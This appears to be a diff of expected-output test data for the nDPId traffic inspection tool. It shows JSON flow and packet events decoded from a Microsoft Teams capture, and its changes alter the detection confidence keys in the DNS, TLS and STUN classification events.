00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1587041693517,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":109,"pkt_l4_len":75,"thread_ts_msec":1587041693517,"pkt":"EBMx8Tl2KDc3AG3ICABFAABfDxsAAP8RKRvAqAEGwKgBAdnVADUASzsZd8IBAAABAAAAAAAAEmItdHItdGVhbXMtZXVuby0wNQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AABwAAQ=="} 
-00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1587041693530,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1587041693530,"pkt":"KDc3AG3IEBMx8Tl2CABFAACrU5xAADkRak7AqAEBwKgBBgA12dUAlwAAd8KBgAABAAAAAQAAEmItdHItdGVhbXMtZXVuby0wNQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AABwAAcAfAAYAAQAAAAUAQARwcmQxDmF6dXJlZG5zLWNsb3VkA25ldAAGbXNuaHN0CW1pY3Jvc29mdMA6AAAnEQAAA4QAAAEsAAk6gAAAADw="} -00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041693530,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041693530,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2486,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1587041693561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693561,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZBAAGwGgJc0cvp7wKgBBgG7w2KOQNor8MQxRoAS\/\/8u4wAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2487,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1587041693561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693561,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NiAbvwxDFGjkDaLFAQIABPogAA"} 
-00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2488,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693516,"flow_last_seen":1587041693561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693561,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2488,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693516,"flow_last_seen":1587041693561,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693561,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2489,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1587041693572,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693572,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXfJQAAGwR4OU0cvp7wKgBBg2Ww2AAw6emARMApyESpEKyND9uZ\/QdWKy6Y58ADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+o0AFAAUAk7L+IJ6YNZTBt6\/p32H0UQC3V0AFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6jYCVAAh\/IMTdT4SN+oAgAAgAAcHVcadqCg=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1587041693582,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693582,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgF74AAEARcjPAqAEGNHL6e8N0DZYATEppAAMAMCESpEI9x0RmdejywONbcT4ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2492,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693582,"flow_last_seen":1587041693582,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2493,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1587041693582,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693582,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NlAbtcWVYoAAAAALAC\/\/\/E5AAAAgQFtAEDAwUBAQgKMITZVQAAAAAEAgAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":200000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1587041693597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693597,"pkt":"EBMx8Tl2KDc3AG3ICABFAADyLLYAAEARXJfAqAEGNHL6jcNgDZYA3iTJAAMAwiESpEIiL+\/H85JL0bmXJ+QADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIfyDE3U+EjfoAFAAUAk7L+IJ6YNZTBt6\/p32H0UQC3V0AFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACB+ROZSH0cQpVQPYpCmfWn5X6jy8HHHqFihd3XDn9tzDQ=="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":200000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":200000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00987{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2495,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041693516,"flow_last_seen":1587041693608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1639,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1587041693608,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2510,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041693611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2510,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041693609,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1587041693611,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693611,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgfyMAAEARCrzAqAEGNHL6jcNhDZYATBjuAAMAMCESpELalY8VcoE3uJ+0vVMADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2515,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1587041693625,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693625,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXVxUAAGwRBmU0cvp7wKgBBg2Ww3QAwyhaARMApyESpEI9x0RmdejywONbcT4ADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+okAFAAUPK7\/QeTw1Z9oICgNLxST+LDzEgAAFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6iYCVAAhb5VsGDC2J+oAgAAgAAc5scadqCg=="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2516,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1587041693628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0Nx9AAGwG5wg0cvp7wKgBBgG7w2XeqFvwXFlWKYAS\/\/\/MOwAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2517,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1587041693628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NlAbtcWVYp3qhb8VAQIADs+gAA"} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693582,"flow_last_seen":1587041693628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693628,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693582,"flow_last_seen":1587041693628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693628,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2519,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1587041693640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1587041693640,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC1fJUAAGwR4QY0cvp7wKgBBg2Ww2AAoaFUAQMAhSESpEIiL+\/H85JL0bmXJ+QADwAEcsZLxgANAAQAAAA8AAEACAABDZg0cvqNgAgABAAAAAaAIAAIAAHB1XGnagqAUAAYm3E8YjrBv7v21SN1g6+m0xjhRrQAAAAAgCIACTIuMC4xLjIxMQAQAAQAAC7gAAgAIK\/9w8VcH20Bp+o9r1mX6tB+MRypEJNYTX2DO\/tetQep"} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693654,"flow_last_seen":1587041693654,"flow_idle_time":200000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693654,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1587041693654,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693654,"pkt":"EBMx8Tl2KDc3AG3ICABFAADySXIAAEARP9\/AqAEGNHL6icN0DZYA3q9FAAMAwiESpELOvwn047sA+HEU4bYADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIW+VbBgwtifoAFAAUPK7\/QeTw1Z9oICgNLxST+LDzEgAAFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACCU7UyKuDgKSJKUvk8SSs9ovhsGMp06Kok2oE1dFOuKzQ=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693654,"flow_last_seen":1587041693654,"flow_idle_time":200000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693654,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693654,"flow_last_seen":1587041693654,"flow_idle_time":200000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693654,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 